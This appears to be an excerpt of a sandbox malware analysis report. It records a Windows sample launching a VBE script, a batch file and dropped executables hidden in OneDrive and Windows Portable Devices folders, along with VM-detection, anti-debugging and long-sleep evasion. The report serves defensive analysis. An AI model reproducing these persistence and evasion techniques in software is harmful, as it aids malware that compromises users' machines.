            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\serversessionmonitor\blockfont.exeMemory allocated: 18B0000 memory reserve | memory write watchJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeMemory allocated: 1B2B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeMemory allocated: 1060000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeMemory allocated: 1AE10000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeMemory allocated: 1AFF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeMemory allocated: 1610000 memory reserve | memory write watch
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeMemory allocated: 1B100000 memory reserve | memory write watch
            Source: C:\serversessionmonitor\blockfont.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeThread delayed: delay time: 600000
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeThread delayed: delay time: 599884
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeThread delayed: delay time: 599768
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeWindow / User API: threadDelayed 1153Jump to behavior
            Source: C:\serversessionmonitor\blockfont.exeWindow / User API: threadDelayed 1011Jump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeWindow / User API: threadDelayed 366Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeWindow / User API: threadDelayed 803
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeWindow / User API: threadDelayed 354
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-22929
            Source: C:\serversessionmonitor\blockfont.exe TID: 3384Thread sleep count: 1153 > 30Jump to behavior
            Source: C:\serversessionmonitor\blockfont.exe TID: 3384Thread sleep count: 1011 > 30Jump to behavior
            Source: C:\serversessionmonitor\blockfont.exe TID: 1368Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe TID: 8064Thread sleep count: 366 > 30Jump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe TID: 7748Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe TID: 7992Thread sleep count: 300 > 30Jump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe TID: 7772Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7960Thread sleep count: 803 > 30
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7604Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7604Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7604Thread sleep time: -599884s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7960Thread sleep count: 354 > 30
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7604Thread sleep time: -599768s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7420Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7928Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\serversessionmonitor\blockfont.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D6A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00D6A5F4
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D7B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00D7B8E0
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D7DD72 VirtualQuery,GetSystemInfo,0_2_00D7DD72
            Source: C:\serversessionmonitor\blockfont.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeThread delayed: delay time: 600000
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeThread delayed: delay time: 599884
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeThread delayed: delay time: 599768
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeThread delayed: delay time: 922337203685477
            Source: wscript.exe, 00000001.00000003.1740625428.0000000000BDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 5P9EdUgv5r.exe, 00000000.00000003.1632997233.00000000031C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
            Source: 5P9EdUgv5r.exe, 00000000.00000003.1632927760.00000000031DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\'
            Source: blockfont.exe, 00000004.00000002.1802492153.000000001C16D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:fs
            Source: wscript.exe, 00000001.00000003.1740625428.0000000000BDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1835586004.000000001C0D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{Q*
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeAPI call chain: ExitProcess graph end nodegraph_0-23328
            Source: C:\serversessionmonitor\blockfont.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D8866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D8866F
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D8753D mov eax, dword ptr fs:[00000030h]0_2_00D8753D
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D8B710 GetProcessHeap,0_2_00D8B710
            Source: C:\serversessionmonitor\blockfont.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D7F063 SetUnhandledExceptionFilter,0_2_00D7F063
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D7F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D7F22B
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D8866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D8866F
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D7EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D7EF05
            Source: C:\serversessionmonitor\blockfont.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\serversessionmonitor\ovpXJB1x2XJwVqS.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\serversessionmonitor\blockfont.exe "C:\serversessionmonitor\blockfont.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe "C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe" Jump to behavior
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D7ED5B cpuid 0_2_00D7ED5B
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00D7A63C
            Source: C:\serversessionmonitor\blockfont.exeQueries volume information: C:\serversessionmonitor\blockfont.exe VolumeInformationJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeQueries volume information: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeQueries volume information: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeQueries volume information: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe VolumeInformation
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D7D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00D7D5D4
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D6ACF5 GetVersionExW,0_2_00D6ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
